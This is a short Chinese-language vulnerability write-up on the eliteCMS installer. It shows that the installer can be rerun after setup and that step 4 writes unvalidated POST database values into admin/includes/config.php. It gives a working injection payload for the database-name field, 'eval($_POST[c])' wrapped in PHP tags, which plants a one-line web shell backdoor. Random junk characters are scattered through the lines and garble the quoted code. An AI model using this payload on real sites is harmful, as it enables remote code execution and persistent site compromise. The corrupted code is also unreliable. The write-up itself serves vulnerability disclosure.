eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装4 s+ q) r- Q' @6 K! `9 R
& V2 x7 |# v* z! j3 G9 S) }另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php9 [. f4 D- f! ~
我们来看代码:2 @% s6 f, B! T0 O
6 l: W5 K, }# c) Q. I...
8 V- O- [: V* c3 s& I& Oelseif ($_GET['step'] == "4") {
+ b: T- u" ^. w2 \' n $file = "../admin/includes/config.php";$ ^; x9 q/ l9 L4 N( }& {
$write = "<?php\n";
4 C# F1 O+ m% h) E# K; X $write .= "/**\n";
: q: n( K7 K' E. G" _; a8 T $write .= "*\n";
' V( [4 v5 V3 Y9 M* ~ $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";0 F4 V! m. K y+ r& i
...略...
0 Q# |; G/ u8 ]( {% x $write .= "*\n";$ W; k4 ]6 I1 o: a, L" ^& n+ m
$write .= "*/\n";
/ @1 o$ k9 _0 K1 g0 K( O8 R; u $write .= "\n";
6 p! e2 _) m$ s y- G1 S; B $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
+ m$ f$ i# \( r# ^$ N $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";, O3 N1 }1 b- u S8 w
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
/ f& T. v8 E/ J; S1 R0 W $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
3 e2 w& [; r6 B, R0 ` $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";8 h7 l4 y. r3 B& B/ ?" A6 e5 e) g: v
$write .= "if (!\$connection) {\n"; A( c; ~1 s9 r% ]+ d! j
$write .= " die(\"Database connection failed\" .mysql_error());\n";
$ C) t. G* V2 H$ I7 F $write .= " \n";+ S0 a' f, ^" e
$write .= "} \n";
% |$ Y3 R. Q5 J' o9 p $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
* | L! T( b% M: T, b+ ? $write .= "if (!\$db_select) {\n";7 K2 R8 D, D5 r, B9 {3 C6 y( j
$write .= " die(\"Database select failed\" .mysql_error());\n";, ~$ h) l: P" c$ M; P3 ^
$write .= " \n";
( l$ k4 p3 j; W* x7 ] $write .= "} \n";
6 {! \2 Q0 a, }8 Q4 A9 ~9 p $write .= "?>\n";
1 K. u( w) | n2 B# a
4 K/ W7 F, U; C$ V $writer = fopen($file, 'w');6 h( x+ } W6 C4 n6 m* Q8 i
...( U% j) x& D. U' C0 J5 s2 Q
" g/ l7 x# G) \( E) u* Q8 m. J在看代码:
! n, D( y- F7 ^* I: U+ x/ { 7 u. r" y3 M& f: {
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
9 P% m2 Q) L% @' O8 D B$ E& P8 b! q$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
3 y& m9 k4 i3 z! y$_SESSION['DB_USER'] = $_POST['DB_USER'];
# ^: Q4 e, t) g" ?9 X3 a$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
3 ^1 h! b% D" K' ^5 Q) v$ ]2 w 2 C6 i9 Y/ a2 i7 `6 y! C9 ]
取值未作任何验证7 e1 E f% W5 ]+ b8 j
如果将数据库名POST数据:2 m! G4 T/ v6 @$ S, d3 R' x7 r( @
% t+ |& M' ]8 T- M3 K6 q
"?><?php eval($_POST[c]);?><?php
6 ~9 o4 Q/ ?8 ^* W. F( O( p& _
4 b7 f1 m' X7 _将导致一句话后门写入/admin/includes/config.php+ p5 \. L. j$ ]4 o+ z
|